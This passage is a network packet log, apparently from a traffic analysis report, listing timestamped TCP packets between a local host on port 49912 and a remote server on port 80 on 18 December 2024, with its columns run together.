                                                                                                                                                                  Dec 18, 2024 11:09:29.893712044 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.893743038 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.894114017 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.894155979 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.894211054 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.894248009 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.895612001 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.895649910 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.895792961 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.895832062 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.896553040 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.896593094 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.896693945 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.896732092 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.897173882 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.897207022 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.897213936 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.897250891 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.898271084 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.898283958 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.898313046 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.898327112 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.899219990 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.899257898 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.899403095 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.899439096 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.900070906 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.900110006 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.900177002 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.900214911 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.901124954 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.901165962 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.901304960 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.901345015 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.902018070 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.902059078 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.902270079 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.902307987 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.903017998 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.903058052 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.903284073 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.903320074 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.903986931 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.904031992 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.904119015 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.904156923 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.907594919 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.907618999 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.907648087 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.907664061 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.907951117 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.907963037 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.907987118 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.908004999 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.908788919 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.908827066 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.909060955 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.909092903 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.909997940 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.910048962 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.910156012 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.910188913 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.910979986 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.911000967 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.911027908 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.911047935 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.912023067 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.912070990 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.912152052 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.912189007 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.913053989 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.913065910 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.913105011 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.913851023 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.913863897 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.913893938 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.913922071 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.915026903 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.915043116 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.915065050 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.915081024 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.915920973 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.915978909 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.916089058 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.916119099 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.916898012 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.916930914 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.917083979 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.917115927 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.917804956 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.917841911 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.918190002 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.918220043 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.918828011 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.918840885 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.918863058 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.918879986 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.919734001 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.919770002 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.919904947 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.919939041 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.920811892 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.920854092 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.920985937 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.921020985 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.921931028 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.921952009 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.921983004 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.921999931 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.056046963 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.056149006 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.056174040 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.056211948 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.056526899 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.056562901 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.056632042 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.056665897 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.057476044 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.057514906 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.057552099 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.057591915 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.058484077 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.058523893 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.058526993 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.058556080 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.059469938 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.059573889 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.059619904 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.059643030 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.060676098 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.060720921 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.060736895 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.060774088 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.061395884 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.061434984 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.061484098 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.061522007 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.062391043 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.062429905 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.062478065 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.062515020 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.063358068 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.063401937 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.063477039 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.063519955 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.064347982 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.064388037 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.064416885 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.064455986 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.065350056 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.065388918 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.065445900 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.065481901 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.066432953 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.066474915 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.066510916 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.066550016 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.067362070 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.067400932 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.067404985 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.067434072 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.068233013 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.068270922 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.073014975 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.073064089 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.073105097 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.073147058 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.073441982 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.073482037 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.073641062 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.073678970 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.073765993 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.073802948 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.074649096 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.074687004 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.074765921 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.074803114 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.075622082 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.075665951 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.075710058 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.075743914 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.076587915 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.076627970 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.076699972 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.076738119 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.077903986 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.077948093 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.077994108 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.078031063 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.078576088 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.078613043 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.078685045 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.078721046 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.079627991 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.079669952 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.079751968 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.079790115 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.080581903 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.080620050 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.080749989 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.080787897 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.081563950 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.081603050 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.081674099 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.081713915 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.082567930 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.082611084 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.082624912 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.082662106 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.083519936 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.083559990 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.083636045 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.083673000 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.084461927 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.084501982 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.084572077 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.084609985 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.085491896 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.085551023 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.085558891 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.085597038 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.086425066 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.086467028 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.086529016 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.086566925 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.087433100 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.087479115 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.087562084 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.087596893 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.088407040 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.088452101 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.088522911 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.088562012 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.089462042 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.089500904 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.089580059 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.089617968 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.090370893 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.090411901 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.090527058 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.090568066 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.091384888 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.091423988 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.091471910 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.091507912 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.092370987 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.092384100 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.092410088 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.092427969 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.093291998 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.093332052 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.093411922 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.093449116 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.094289064 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.094326973 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.094432116 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.094466925 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.095269918 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.095320940 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.095362902 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.095397949 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.096237898 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.096281052 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.096324921 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.096364021 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.097522020 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.097559929 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.097644091 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.097678900 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.098346949 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.098367929 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.098387003 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.098416090 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.099229097 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.099268913 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.099309921 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.099354982 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.100217104 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.100256920 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.100305080 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.100341082 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.101169109 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.101208925 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.101305962 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.101344109 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.102160931 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.102200031 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.102236986 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.102273941 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.103123903 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.103174925 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.103214025 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.103254080 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.104146004 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.104168892 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.104188919 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.104209900 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.105153084 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.105194092 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.105237961 CET804991231.41.244.11192.168.2.6
